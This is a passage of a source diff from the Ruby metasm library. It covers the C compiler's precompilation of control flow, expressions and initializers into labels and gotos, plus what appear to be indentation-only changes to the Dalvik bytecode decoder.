lastgoto.target == s.name + list << lastgoto + list.delete s.name if not hadref + end + when 2; @statements.delete s if not list.include? s.name + end + when Goto, If + s.kind_of?(If) ? g = s.bthen : g = s + case step + when 1 + hadref = list.include? g.target + lastgoto = g + list << g.target + when 2 + if list.include? g + idx = @statements.index s + @statements.delete s + @statements[idx, 0] = s.test if s != g and not s.test.constant? + end + end + end + } + list + end + + # noop + def precompile_make_block(scope) self end + + def continue_label ; defined?(@continue_label) ? @continue_label : @outer.continue_label end + def continue_label=(l) @continue_label = l end + def break_label ; defined?(@break_label) ? @break_label : @outer.break_label end + def break_label=(l) @break_label = l end + def return_label ; defined?(@return_label) ? @return_label : @outer.return_label end + def return_label=(l) @return_label = l end + def nonauto_label=(l) @nonauto_label = l end + def nonauto_label ; defined?(@nonauto_label) ? @nonauto_label : @outer.nonauto_label end + def function ; defined?(@function) ? @function : @outer.function end + def function=(f) @function = f end + end + + class Declaration + def precompile(compiler, scope) + if (@var.type.kind_of? Function and @var.initializer and scope != compiler.toplevel) or @var.storage == :static or compiler.check_reserved_name(@var) + # TODO fix label name in export table if __exported + scope.symbol.delete @var.name + old = @var.name + @var.name = compiler.new_label @var.name until @var.name != old + compiler.toplevel.symbol[@var.name] = @var + # TODO no pure inline if addrof(func) needed + compiler.toplevel.statements << self unless @var.attributes.to_a.include? 'inline' + else + scope.symbol[@var.name] ||= @var + appendme = true + end + + if i = @var.initializer + if @var.type.kind_of? Function + if @var.type.type.kind_of? Struct + s = @var.type.type + v = Variable.new + v.name = compiler.new_label('return_struct_ptr') + v.type = Pointer.new(s) + CExpression.precompile_type(compiler, scope, v) + @var.type.args.unshift v + @var.type.type = v.type + end + i.function = @var + i.return_label = compiler.new_label('epilog') + i.nonauto_label = {} + i.precompile(compiler) + Label.new(i.return_label).precompile(compiler, i) + i.precompile_optimize + # append now so that static dependencies are declared before us + scope.statements << self if appendme and not @var.attributes.to_a.include? 'inline' + elsif scope != compiler.toplevel and @var.storage != :static + scope.statements << self if appendme + Declaration.precompile_dyn_initializer(compiler, scope, @var, @var.type, i) + @var.initializer = nil + else + scope.statements << self if appendme + @var.initializer = Declaration.precompile_static_initializer(compiler, @var.type, i) + end + else + scope.statements << self if appendme + end + + end + + # turns an initializer to CExpressions in scope.statements + def self.precompile_dyn_initializer(compiler, scope, var, type, init) + case type = type.untypedef + when Array + # XXX TODO type.length may be dynamic !! + case init + when CExpression + # char toto[] = "42" + if not init.kind_of? CExpression or init.op or init.lexpr or not init.rexpr.kind_of? ::String + raise "unknown initializer #{init.inspect} for #{var.inspect}" + end + init = init.rexpr.unpack('C*') + [0] + init.map! { |chr| CExpression.new(nil, nil, chr, type.type) } + precompile_dyn_initializer(compiler, scope, var, type, init) + + when ::Array + type.length ||= init.length + # len is an Integer + init.each_with_index { |it, idx| + next if not it + break if idx >= type.length + idx = CExpression.new(nil, nil, idx, BaseType.new(:long, :unsigned)) + v = CExpression.new(var, :'[]', idx, type.type) + precompile_dyn_initializer(compiler, scope, v, type.type, it) + } + else raise "unknown initializer #{init.inspect} for #{var.inspect}" + end + when Union + case init + when CExpression, Variable + if init.type.untypedef.kind_of? BaseType + # works for struct foo bar[] = {0}; ... + type.members.each { |m| + v = CExpression.new(var, :'.', m.name, m.type) + precompile_dyn_initializer(compiler, scope, v, v.type, init) + } + elsif init.type.untypedef.kind_of? type.class + CExpression.new(var, :'=', init, type).precompile(compiler, scope) + else + raise "bad initializer #{init.inspect} for #{var.inspect}" + end + when ::Array + init.each_with_index{ |it, idx| + next if not it + m = type.members[idx] + v = CExpression.new(var, :'.', m.name, m.type) + precompile_dyn_initializer(compiler, scope, v, m.type, it) + } + else raise "unknown initializer #{init.inspect} for #{var.inspect}" + end + else + case init + when CExpression + CExpression.new(var, :'=', init, type).precompile(compiler, scope) + else raise "unknown initializer #{init.inspect} for #{var.inspect}" + end + end + end + + # returns a precompiled static initializer (eg string constants) + def self.precompile_static_initializer(compiler, type, init) + # TODO + case type = type.untypedef + when Array + if init.kind_of? ::Array + init.map { |i| precompile_static_initializer(compiler, type.type, i) } + else + init + end + when Union + if init.kind_of? ::Array + init.zip(type.members).map { |i, m| precompile_static_initializer(compiler, m.type, i) } + else + init + end + else + if init.kind_of? CExpression and init = init.reduce(compiler) and init.kind_of? CExpression + if not init.op and init.rexpr.kind_of? ::String + v = Variable.new + v.storage = :static + v.name = 'char_' + init.rexpr.gsub(/[^a-zA-Z]/, '')[0, 8] + v.type = Array.new(type.type) + v.type.length = init.rexpr.length + 1 + v.type.type.qualifier = [:const] + v.initializer = CExpression.new(nil, nil, init.rexpr, type) + Declaration.new(v).precompile(compiler, compiler.toplevel) + init.rexpr = v + end + init.rexpr = precompile_static_initializer(compiler, init.rexpr.type, init.rexpr) if init.rexpr.kind_of? CExpression + init.lexpr = precompile_static_initializer(compiler, init.lexpr.type, init.lexpr) if init.lexpr.kind_of? CExpression + end + init + end + end + end + + class If + def precompile(compiler, scope) + expr = lambda { |e| e.kind_of?(CExpression) ? e : CExpression.new(nil, nil, e, e.type) } + + if @bthen.kind_of? Goto or @bthen.kind_of? Break or @bthen.kind_of? Continue + # if () goto l; else b; => if () goto l; b; + if belse + t1 = @belse + @belse = nil + end + + # need to convert user-defined Goto target ! + @bthen.precompile(compiler, scope) + @bthen = scope.statements.pop # break => goto break_label + elsif belse + # if () a; else b; => if () goto then; b; goto end; then: a; end: + t1 = @belse + t2 = @bthen + l2 = compiler.new_label('if_then') + @bthen = Goto.new(l2) + @belse = nil + l3 = compiler.new_label('if_end') + else + # if () a; => if (!) goto end; a; end: + t1 = @bthen + l2 = compiler.new_label('if_end') + @bthen = Goto.new(l2) + @test = CExpression.negate(@test) + end + + @test = expr[@test] + case @test.op + when :'&&' + # if (c1 && c2) goto a; => if (!c1) goto b; if (c2) goto a; b: + l1 = compiler.new_label('if_nand') + If.new(CExpression.negate(@test.lexpr), Goto.new(l1)).precompile(compiler, scope) + @test = expr[@test.rexpr] + precompile(compiler, scope) + when :'||' + l1 = compiler.new_label('if_or') + If.new(expr[@test.lexpr], Goto.new(@bthen.target)).precompile(compiler, scope) + @test = expr[@test.rexpr] + precompile(compiler, scope) + else + @test = CExpression.precompile_inner(compiler, scope, @test) + t = @test.reduce(compiler) + if t.kind_of? ::Integer + if t == 0 + Label.new(l1, nil).precompile(compiler, scope) if l1 + t1.precompile(compiler, scope) if t1 + Label.new(l2, nil).precompile(compiler, scope) if l2 + Label.new(l3, nil).precompile(compiler, scope) if l3 + else + scope.statements << @bthen + Label.new(l1, nil).precompile(compiler, scope) if l1 + Label.new(l2, nil).precompile(compiler, scope) if l2 + t2.precompile(compiler, scope) if t2 + Label.new(l3, nil).precompile(compiler, scope) if l3 + end + return + end + scope.statements << self + end + + Label.new(l1, nil).precompile(compiler, scope) if l1 + t1.precompile(compiler, scope) if t1 + Goto.new(l3).precompile(compiler, scope) if l3 + Label.new(l2, nil).precompile(compiler, scope) if l2 + t2.precompile(compiler, scope) if t2 + Label.new(l3, nil).precompile(compiler, scope) if l3 + end + end + + class For + def precompile(compiler, scope) + if init + @init.precompile(compiler, scope) + scope = @init if @init.kind_of? Block + end + + @body = @body.precompile_make_block scope + @body.continue_label = compiler.new_label 'for_continue' + @body.break_label = compiler.new_label 'for_break' + label_test = compiler.new_label 'for_test' + + Label.new(label_test).precompile(compiler, scope) + if test + If.new(CExpression.negate(@test), Goto.new(@body.break_label)).precompile(compiler, scope) + end + + @body.precompile(compiler, scope) + + Label.new(@body.continue_label).precompile(compiler, scope) + if iter + @iter.precompile(compiler, scope) + end + + Goto.new(label_test).precompile(compiler, scope) + Label.new(@body.break_label).precompile(compiler, scope) + end + end + + class While + def precompile(compiler, scope) + @body = @body.precompile_make_block scope + @body.continue_label = compiler.new_label('while_continue') + @body.break_label = compiler.new_label('while_break') + + Label.new(@body.continue_label).precompile(compiler, scope) + + If.new(CExpression.negate(@test), Goto.new(@body.break_label)).precompile(compiler, scope) + + @body.precompile(compiler, scope) + + Goto.new(@body.continue_label).precompile(compiler, scope) + Label.new(@body.break_label).precompile(compiler, scope) + end + end + + class DoWhile + def precompile(compiler, scope) + @body = @body.precompile_make_block scope + @body.continue_label = compiler.new_label('dowhile_continue') + @body.break_label = compiler.new_label('dowhile_break') + loop_start = compiler.new_label('dowhile_start') + + Label.new(loop_start).precompile(compiler, scope) + + @body.precompile(compiler, scope) + + Label.new(@body.continue_label).precompile(compiler, scope) + + If.new(@test, Goto.new(loop_start)).precompile(compiler, scope) + + Label.new(@body.break_label).precompile(compiler, scope) + end + end + + class Switch + def precompile(compiler, scope) + var = Variable.new + var.storage = :register + var.name = compiler.new_label('switch') + var.type = @test.type + var.initializer = @test + CExpression.precompile_type(compiler, scope, var) + Declaration.new(var).precompile(compiler, scope) + + @body = @body.precompile_make_block scope + @body.break_label = compiler.new_label('switch_break') + @body.precompile(compiler) + default = @body.break_label + # recursive lambda to change Case to Labels + # dynamically creates the If sequence + walk = lambda { |blk| + blk.statements.each_with_index { |s, i| + case s + when Case + label = compiler.new_label('case') + if s.expr == 'default' + default = label + elsif s.exprup + If.new(CExpression.new(CExpression.new(var, :'>=', s.expr, BaseType.new(:int)), :'&&', + CExpression.new(var, :'<=', s.exprup, BaseType.new(:int)), + BaseType.new(:int)), Goto.new(label)).precompile(compiler, scope) + else + If.new(CExpression.new(var, :'==', s.expr, BaseType.new(:int)), + Goto.new(label)).precompile(compiler, scope) + end + blk.statements[i] = Label.new(label) + when Block + walk[s] + end + } + } + walk[@body] + Goto.new(default).precompile(compiler, scope) + scope.statements << @body + Label.new(@body.break_label).precompile(compiler, scope) + end + end + + class Continue + def precompile(compiler, scope) + Goto.new(scope.continue_label).precompile(compiler, scope) + end + end + + class Break + def precompile(compiler, scope) + Goto.new(scope.break_label).precompile(compiler, scope) + end + end + + class Return + def precompile(compiler, scope) + if @value + @value = CExpression.new(nil, nil, @value, @value.type) if not @value.kind_of? CExpression + if @value.type.untypedef.kind_of? Struct + @value = @value.precompile_inner(compiler, scope) + func = scope.function.type + CExpression.new(CExpression.new(nil, :*, func.args.first, @value.type), :'=', @value, @value.type).precompile(compiler, scope) + @value = func.args.first + else + # cast to function return type + @value = CExpression.new(nil, nil, @value, scope.function.type.type).precompile_inner(compiler, scope) + end + scope.statements << self + end + Goto.new(scope.return_label).precompile(compiler, scope) + end + end + + class Label + def precompile(compiler, scope) + if name and (not compiler.auto_label_list[@name]) + @name = scope.nonauto_label[@name] ||= compiler.new_label(@name) + end + scope.statements << self + if statement + @statement.precompile(compiler, scope) + @statement = nil + end + end + end + + class Case + def precompile(compiler, scope) + @expr = CExpression.precompile_inner(compiler, scope, @expr) + @exprup = CExpression.precompile_inner(compiler, scope, @exprup) if exprup + super(compiler, scope) + end + end + + class Goto + def precompile(compiler, scope) + if not compiler.auto_label_list[@target] + @target = scope.nonauto_label[@target] ||= compiler.new_label(@target) + end + scope.statements << self + end + end + + class Asm + def precompile(compiler, scope) + scope.statements << self + # TODO CExpr.precompile_type(clobbers) + end + end + + class CExpression + def precompile(compiler, scope) + i = precompile_inner(compiler, scope, false) + scope.statements << i if i + end + + # changes obj.type to a precompiled type + # keeps struct/union, change everything else to __int\d + # except Arrays if declaration is true (need to know variable allocation sizes etc) + # returns the type + def self.precompile_type(compiler, scope, obj, declaration = false) + case t = obj.type.untypedef + when BaseType + case t.name + when :void + when :float, :double, :longdouble + else t = BaseType.new("__int#{compiler.typesize[t.name]*8}".to_sym, t.specifier) + end + when Array + if declaration; precompile_type(compiler, scope, t, declaration) + else t = BaseType.new("__int#{compiler.typesize[:ptr]*8}".to_sym, :unsigned) + end + when Pointer + if t.type.untypedef.kind_of? Function + precompile_type(compiler, scope, t, declaration) + else + t = BaseType.new("__int#{compiler.typesize[:ptr]*8}".to_sym, :unsigned) + end + when Enum; t = BaseType.new("__int#{compiler.typesize[:int]*8}".to_sym) + when Function + precompile_type(compiler, scope, t) + t.args ||= [] + t.args.each { |a| precompile_type(compiler, scope, a) } + when Union + if declaration and t.members and not t.name # anonymous struct + t.members.each { |a| precompile_type(compiler, scope, a, true) } + end + else raise 'bad type ' + t.inspect + end + (t.qualifier ||= []).concat obj.type.qualifier if obj.type.qualifier and t != obj.type + (t.attributes ||= []).concat obj.type.attributes if obj.type.attributes and t != obj.type + while obj.type.kind_of? TypeDef + obj.type = obj.type.type + (t.qualifier ||= []).concat obj.type.qualifier if obj.type.qualifier and t != obj.type + (t.attributes ||= []).concat obj.type.attributes if obj.type.attributes and t != obj.type + end + obj.type = t + end + + def self.precompile_inner(compiler, scope, expr, nested = true) + case expr + when CExpression; expr.precompile_inner(compiler, scope, nested) + else expr + end + end + + # returns a new CExpression with simplified self.type, computes structure offsets + # turns char[]/float immediates to reference to anonymised const + # TODO 'a = b += c' => 'b += c; a = b' (use nested argument) + # TODO handle precompile_inner return nil + # TODO struct.bits + def precompile_inner(compiler, scope, nested = true) + case @op + when :'.' + # a.b => (&a)->b + lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) + ll = lexpr + ll = lexpr.rexpr while ll.kind_of? CExpression and not ll.op + if ll.kind_of? CExpression and ll.op == :'*' and not ll.lexpr + # do not change lexpr.rexpr.type directly to a pointer, might retrigger (ptr+imm) => (ptr + imm*sizeof(*ptr)) + @lexpr = CExpression.new(nil, nil, ll.rexpr, Pointer.new(lexpr.type)) + else + @lexpr = CExpression.new(nil, :'&', lexpr, Pointer.new(lexpr.type)) + end + @op = :'->' + precompile_inner(compiler, scope) + when :'->' + # a->b => *(a + off(b)) + struct = @lexpr.type.untypedef.type.untypedef + lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) + @lexpr = nil + @op = nil + if struct.kind_of? Struct and (off = struct.offsetof(compiler, @rexpr)) != 0 + off = CExpression.new(nil, nil, off, BaseType.new(:int, :unsigned)) + @rexpr = CExpression.new(lexpr, :'+', off, lexpr.type) + # ensure the (ptr + value) is not expanded to (ptr + value * sizeof(*ptr)) + CExpression.precompile_type(compiler, scope, @rexpr) + else + # union or 1st struct member + @rexpr = lexpr + end + if @type.kind_of? Array # Array member type is already an address + else + @rexpr = CExpression.new(nil, :*, @rexpr, @rexpr.type) + end + precompile_inner(compiler, scope) + when :'[]' + rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) + if rexpr.kind_of? CExpression and not rexpr.op and rexpr.rexpr == 0 + @rexpr = @lexpr + else + @rexpr = CExpression.new(@lexpr, :'+', rexpr, @lexpr.type) + end + @op = :'*' + @lexpr = nil + precompile_inner(compiler, scope) + when :'?:' + # cannot precompile in place, a conditionnal expression may have a coma: must turn into If + if @lexpr.kind_of? CExpression + @lexpr = @lexpr.precompile_inner(compiler, scope) + if not @lexpr.lexpr and not @lexpr.op and @lexpr.rexpr.kind_of? ::Numeric + if @lexpr.rexpr == 0 + e = @rexpr[1] + else + e = @rexpr[0] + end + e = CExpression.new(nil, nil, e, e.type) if not e.kind_of? CExpression + return e.precompile_inner(compiler, scope) + end + end + raise 'conditional in toplevel' if scope == compiler.toplevel # just in case + var = Variable.new + var.storage = :register + var.name = compiler.new_label('ternary') + var.type = @rexpr[0].type + CExpression.precompile_type(compiler, scope, var) + Declaration.new(var).precompile(compiler, scope) + If.new(@lexpr, CExpression.new(var, :'=', @rexpr[0], var.type), CExpression.new(var, :'=', @rexpr[1], var.type)).precompile(compiler, scope) + @lexpr = nil + @op = nil + @rexpr = var + precompile_inner(compiler, scope) + when :'&&' + if scope == compiler.toplevel + @lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) + @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) + CExpression.precompile_type(compiler, scope, self) + self + else + var = Variable.new + var.storage = :register + var.name = compiler.new_label('and') + var.type = @type + CExpression.precompile_type(compiler, scope, var) + var.initializer = CExpression.new(nil, nil, 0, var.type) + Declaration.new(var).precompile(compiler, scope) + l = @lexpr.kind_of?(CExpression) ? @lexpr : CExpression.new(nil, nil, @lexpr, @lexpr.type) + r = @rexpr.kind_of?(CExpression) ? @rexpr : CExpression.new(nil, nil, @rexpr, @rexpr.type) + If.new(l, If.new(r, CExpression.new(var, :'=', CExpression.new(nil, nil, 1, var.type), var.type))).precompile(compiler, scope) + @lexpr = nil + @op = nil + @rexpr = var + precompile_inner(compiler, scope) + end + when :'||' + if scope == compiler.toplevel + @lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) + @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) + CExpression.precompile_type(compiler, scope, self) + self + else + var = Variable.new + var.storage = :register + var.name = compiler.new_label('or') + var.type = @type + CExpression.precompile_type(compiler, scope, var) + var.initializer = CExpression.new(nil, nil, 1, var.type) + Declaration.new(var).precompile(compiler, scope) + l = @lexpr.kind_of?(CExpression) ? @lexpr : CExpression.new(nil, nil, @lexpr, @lexpr.type) + l = CExpression.new(nil, :'!', l, var.type) + r = @rexpr.kind_of?(CExpression) ? @rexpr : CExpression.new(nil, nil, @rexpr, @rexpr.type) + r = CExpression.new(nil, :'!', r, var.type) + If.new(l, If.new(r, CExpression.new(var, :'=', CExpression.new(nil, nil, 0, var.type), var.type))).precompile(compiler, scope) + @lexpr = nil + @op = nil + @rexpr = var + precompile_inner(compiler, scope) + end + when :funcall + if @lexpr.kind_of? Variable and @lexpr.type.kind_of? Function and @lexpr.attributes and @lexpr.attributes.include? 'inline' and @lexpr.initializer + # TODO check recursive call (direct or indirect) + raise 'inline varargs unsupported' if @lexpr.type.varargs + rtype = @lexpr.type.type.untypedef + if not rtype.kind_of? BaseType or rtype.name != :void + rval = Variable.new + rval.name = compiler.new_label('inline_return') + rval.type = @lexpr.type.type + Declaration.new(rval).precompile(compiler, scope) + end + inline_label = {} + locals = @lexpr.type.args.zip(@rexpr).inject({}) { |h, (fa, a)| + h.update fa => CExpression.new(nil, nil, a, fa.type).precompile_inner(compiler, scope) + } + copy_inline_ce = lambda { |ce| + case ce + when CExpression; CExpression.new(copy_inline_ce[ce.lexpr], ce.op, copy_inline_ce[ce.rexpr], ce.type) + when Variable; locals[ce] || ce + when ::Array; ce.map { |e_| copy_inline_ce[e_] } + else ce + end + } + copy_inline = lambda { |stmt, scp| + case stmt + when Block + b = Block.new(scp) + stmt.statements.each { |s| + s = copy_inline[s, b] + b.statements << s if s + } + b + when If; If.new(copy_inline_ce[stmt.test], copy_inline[stmt.bthen, scp]) # re-precompile ? + when Label; Label.new(inline_label[stmt.name] ||= compiler.new_label('inline_'+stmt.name)) + when Goto; Goto.new(inline_label[stmt.target] ||= compiler.new_label('inline_'+stmt.target)) + when Return; CExpression.new(rval, :'=', copy_inline_ce[stmt.value], rval.type).precompile_inner(compiler, scp) if stmt.value + when CExpression; copy_inline_ce[stmt] + when Declaration + nv = stmt.var.dup + if nv.type.kind_of? Array and nv.type.length.kind_of? CExpression + nv.type = Array.new(nv.type.type, copy_inline_ce[nv.type.length]) # XXX nested dynamic? + end + locals[stmt.var] = nv + scp.symbol[nv.name] = nv + Declaration.new(nv) + else raise 'unexpected inline statement ' + stmt.inspect + end + } + scope.statements << copy_inline[@lexpr.initializer, scope] # body already precompiled + CExpression.new(nil, nil, rval, rval.type).precompile_inner(compiler, scope) + elsif @type.kind_of? Struct + var = Variable.new + var.name = compiler.new_label('return_struct') + var.type = @type + Declaration.new(var).precompile(compiler, scope) + @rexpr.unshift CExpression.new(nil, :&, var, Pointer.new(var.type)) + + var2 = Variable.new + var2.name = compiler.new_label('return_struct_ptr') + var2.type = Pointer.new(@type) + var2.storage = :register + CExpression.precompile_type(compiler, scope, var2) + Declaration.new(var2).precompile(compiler, scope) + @type = var2.type + CExpression.new(var2, :'=', self, var2.type).precompile(compiler, scope) + + CExpression.new(nil, :'*', var2, var.type).precompile_inner(compiler, scope) + else + t = @lexpr.type.untypedef + t = t.type.untypedef if t.pointer? + @lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) + types = t.args.map { |a| a.type } + # cast args to func prototype + @rexpr.map! { |e_| (types.empty? ? e_ : CExpression.new(nil, nil, e_, types.shift)).precompile_inner(compiler, scope) } + CExpression.precompile_type(compiler, scope, self) + self + end + when :',' + lexpr = @lexpr.kind_of?(CExpression) ? @lexpr : CExpression.new(nil, nil, @lexpr, @lexpr.type) + rexpr = @rexpr.kind_of?(CExpression) ? @rexpr : CExpression.new(nil, nil, @rexpr, @rexpr.type) + lexpr.precompile(compiler, scope) + rexpr.precompile_inner(compiler, scope) + when :'!' + CExpression.precompile_type(compiler, scope, self) + if @rexpr.kind_of?(CExpression) + case @rexpr.op + when :'<', :'>', :'<=', :'>=', :'==', :'!=' + @op = { :'<' => :'>=', :'>' => :'<=', :'<=' => :'>', :'>=' => :'<', + :'==' => :'!=', :'!=' => :'==' }[@rexpr.op] + @lexpr = @rexpr.lexpr + @rexpr = @rexpr.rexpr + precompile_inner(compiler, scope) + when :'&&', :'||' + @op = { :'&&' => :'||', :'||' => :'&&' }[@rexpr.op] + @lexpr = CExpression.new(nil, :'!', @rexpr.lexpr, @type) + @rexpr = CExpression.new(nil, :'!', @rexpr.rexpr, @type) + precompile_inner(compiler, scope) + when :'!' + if @rexpr.rexpr.kind_of? CExpression + @op = nil + @rexpr = @rexpr.rexpr + else + @op = :'!=' + @lexpr = @rexpr.rexpr + @rexpr = CExpression.new(nil, nil, 0, @lexpr.type) + end + precompile_inner(compiler, scope) + else + @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) + self + end + else + @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) + self + end + when :'++', :'--' + if not @rexpr + var = Variable.new + var.storage = :register + var.name = compiler.new_label('postincrement') + var.type = @type + Declaration.new(var).precompile(compiler, scope) + CExpression.new(var, :'=', @lexpr, @type).precompile(compiler, scope) + CExpression.new(nil, @op, @lexpr, @type).precompile(compiler, scope) + @lexpr = nil + @op = nil + @rexpr = var + precompile_inner(compiler, scope) + elsif @type.pointer? and compiler.sizeof(nil, @type.untypedef.type.untypedef) != 1 + # ++ptr => ptr += sizeof(*ptr) (done in += precompiler) + @op = { :'++' => :'+=', :'--' => :'-=' }[@op] + @lexpr = @rexpr + @rexpr = CExpression.new(nil, nil, 1, BaseType.new(:ptr, :unsigned)) + precompile_inner(compiler, scope) + else + CExpression.precompile_type(compiler, scope, self) + @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) + self + end + when :'=' + # handle structure assignment/array assignment + case @lexpr.type.untypedef + when Union + # rexpr may be a :funcall + @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) + @lexpr.type.untypedef.members.zip(@rexpr.type.untypedef.members) { |m1, m2| + # assume m1 and m2 are compatible + v1 = CExpression.new(@lexpr, :'.', m1.name, m1.type) + v2 = CExpression.new(@rexpr, :'.', m2.name, m1.type) + CExpression.new(v1, :'=', v2, v1.type).precompile(compiler, scope) + } + # (foo = bar).toto + @op = nil + @rexpr = @lexpr + @lexpr = nil + @type = @rexpr.type + precompile_inner(compiler, scope) if nested + when Array + if not len = @lexpr.type.untypedef.length + @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) + # char toto[] = "bla" + if @rexpr.kind_of? CExpression and not @rexpr.lexpr and not @rexpr.op and + @rexpr.rexpr.kind_of? Variable and @rexpr.rexpr.type.kind_of? Array + len = @rexpr.rexpr.type.length + end + end + raise 'array initializer with no length !' if not len + # TODO optimize... + len.times { |i| + i = CExpression.new(nil, nil, i, BaseType.new(:long, :unsigned)) + v1 = CExpression.new(@lexpr, :'[]', i, @lexpr.type.untypedef.type) + v2 = CExpression.new(@rexpr, :'[]', i, v1.type) + CExpression.new(v1, :'=', v2, v1.type).precompile(compiler, scope) + } + @op = nil + @rexpr = @lexpr + @lexpr = nil + @type = @rexpr.type + precompile_inner(compiler, scope) if nested + else + @lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) + @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) + CExpression.precompile_type(compiler, scope, self) + self + end + when nil + case @rexpr + when Block + # compound statements + raise 'compound statement in toplevel' if scope == compiler.toplevel # just in case + var = Variable.new + var.storage = :register + var.name = compiler.new_label('compoundstatement') + var.type = @type + CExpression.precompile_type(compiler, scope, var) + Declaration.new(var).precompile(compiler, scope) + if @rexpr.statements.last.kind_of? CExpression + @rexpr.statements[-1] = CExpression.new(var, :'=', @rexpr.statements[-1], var.type) + @rexpr.precompile(compiler, scope) + end + @rexpr = var + precompile_inner(compiler, scope) + when ::String + # char[] immediate + v = Variable.new + v.storage = :static + v.name = 'char_' + @rexpr.tr('^a-zA-Z', '')[0, 8] + v.type = Array.new(@type.type) + v.type.length = @rexpr.length + 1 + v.type.type.qualifier = [:const] + v.initializer = CExpression.new(nil, nil, @rexpr, @type) + Declaration.new(v).precompile(compiler, scope) + @rexpr = v + precompile_inner(compiler, scope) + when ::Float + # float immediate + v = Variable.new + v.storage = :static + v.name = @type.untypedef.name.to_s + v.type = @type + v.type.qualifier = [:const] + v.initializer = CExpression.new(nil, nil, @rexpr, @type) + Declaration.new(v).precompile(compiler, scope) + @rexpr = CExpression.new(nil, :'*', v, v.type) + precompile_inner(compiler, scope) + when CExpression + # simplify casts + CExpression.precompile_type(compiler, scope, self) + # propagate type first so that __uint64 foo() { return -1 } => 0xffffffffffffffff + @rexpr.type = @type if @rexpr.kind_of? CExpression and @rexpr.op == :- and not @rexpr.lexpr and @type.kind_of? BaseType and @type.name == :__int64 # XXX kill me + @rexpr = @rexpr.precompile_inner(compiler, scope) + if @type.kind_of? BaseType and @rexpr.type.kind_of? BaseType + if @rexpr.type == @type + # noop cast + @lexpr, @op, @rexpr = @rexpr.lexpr, @rexpr.op, @rexpr.rexpr + elsif not @rexpr.op and @type.integral? and @rexpr.type.integral? + if @rexpr.rexpr.kind_of? ::Numeric and (val = reduce(compiler)).kind_of? ::Numeric + @rexpr = val + elsif compiler.typesize[@type.name] < compiler.typesize[@rexpr.type.name] + # (char)(short)(int)(long)foo => (char)foo + @rexpr = @rexpr.rexpr + end + end + end + self + else + CExpression.precompile_type(compiler, scope, self) + self + end + else + # int+ptr => ptr+int + if @op == :+ and @lexpr and @lexpr.type.integral? and @rexpr.type.pointer? + @rexpr, @lexpr = @lexpr, @rexpr + end + + # handle pointer + 2 == ((char *)pointer) + 2*sizeof(*pointer) + if @rexpr and [:'+', :'+=', :'-', :'-='].include? @op and + @type.pointer? and @rexpr.type.integral? + sz = compiler.sizeof(nil, @type.untypedef.type.untypedef) + if sz != 1 + sz = CExpression.new(nil, nil, sz, @rexpr.type) + @rexpr = CExpression.new(@rexpr, :'*', sz, @rexpr.type) + end + end + + # type promotion => cast + case @op + when :+, :-, :*, :/, :&, :|, :^, :% + if @lexpr + if @lexpr.type != @type + @lexpr = CExpression.new(nil, nil, @lexpr, @lexpr.type) if not @lexpr.kind_of? CExpression + @lexpr = CExpression.new(nil, nil, @lexpr, @type) + end + if @rexpr.type != @type + @rexpr = CExpression.new(nil, nil, @rexpr, @rexpr.type) if not @rexpr.kind_of? CExpression + @rexpr = CExpression.new(nil, nil, @rexpr, @type) + end + end + when :>>, :<< + # char => int + if @lexpr.type != @type + @lexpr = CExpression.new(nil, nil, @lexpr, @lexpr.type) if not @lexpr.kind_of? CExpression + @lexpr = CExpression.new(nil, nil, @lexpr, @type) + end + when :'+=', :'-=', :'*=', :'/=', :'&=', :'|=', :'^=', :'%=' + if @rexpr.type != @lexpr.type + @rexpr = CExpression.new(nil, nil, @rexpr, @rexpr.type) if not @rexpr.kind_of? CExpression + @rexpr = CExpression.new(nil, nil, @rexpr, @type) + end + end + + @lexpr = CExpression.precompile_inner(compiler, scope, @lexpr) + @rexpr = CExpression.precompile_inner(compiler, scope, @rexpr) + + if @op == :'&' and not @lexpr + rr = @rexpr + rr = rr.rexpr while rr.kind_of? CExpression and not rr.op + if rr.kind_of? CExpression and rr.op == :'*' and not rr.lexpr + @lexpr = nil + @op = nil + @rexpr = rr.rexpr + return precompile_inner(compiler, scope) + elsif rr != @rexpr + @rexpr = rr + return precompile_inner(compiler, scope) + end + end + + CExpression.precompile_type(compiler, scope, self) + + isnumeric = lambda { |e_| e_.kind_of?(::Numeric) or (e_.kind_of? CExpression and + not e_.lexpr and not e_.op and e_.rexpr.kind_of? ::Numeric) } + + # calc numeric + # XXX do not simplify operations involving variables (for type overflow etc) + if isnumeric[@rexpr] and (not @lexpr or isnumeric[@lexpr]) and (val = reduce(compiler)).kind_of? ::Numeric + @lexpr = nil + @op = nil + @rexpr = val + end + + self + end + end + end end end diff --git a/lib/metasm/metasm/dalvik/decode.rb b/lib/metasm/metasm/dalvik/decode.rb index 8a7107e0462a1..1b64eb078931d 100644 --- a/lib/metasm/metasm/dalvik/decode.rb +++ b/lib/metasm/metasm/dalvik/decode.rb @@ -8,189 +8,189 @@ module Metasm class Dalvik - def build_bin_lookaside - end + def build_bin_lookaside + end - def decode_findopcode(edata) - return if edata.ptr >= edata.data.length - di = DecodedInstruction.new(self) - di.opcode = opcode_list[edata.decode_imm(:u16, @endianness) & 0xff] - edata.ptr -= 2 - di - end + def decode_findopcode(edata) + return if edata.ptr >= edata.data.length + di = DecodedInstruction.new(self) + di.opcode = opcode_list[edata.decode_imm(:u16, @endianness) & 0xff] + edata.ptr -= 2 + di + end - def decode_instr_op(edata, di) - op = di.opcode - di.instruction.opname = op.name - - val = [edata.decode_imm(:u16, @endianness)] + def decode_instr_op(edata, di) + op = di.opcode + di.instruction.opname = op.name + + val = [edata.decode_imm(:u16, @endianness)] - op.args.each { |a| - di.instruction.args << case a - when :i16 - val << edata.decode_imm(:i16, @endianness) - Expression[val.last] - when :u16 - val << edata.decode_imm(:u16, @endianness) - Expression[val.last] - when :r16 - val << edata.decode_imm(:u16, @endianness) - Reg.new(val.last) - when :i16_32hi - val << edata.decode_imm(:i16, 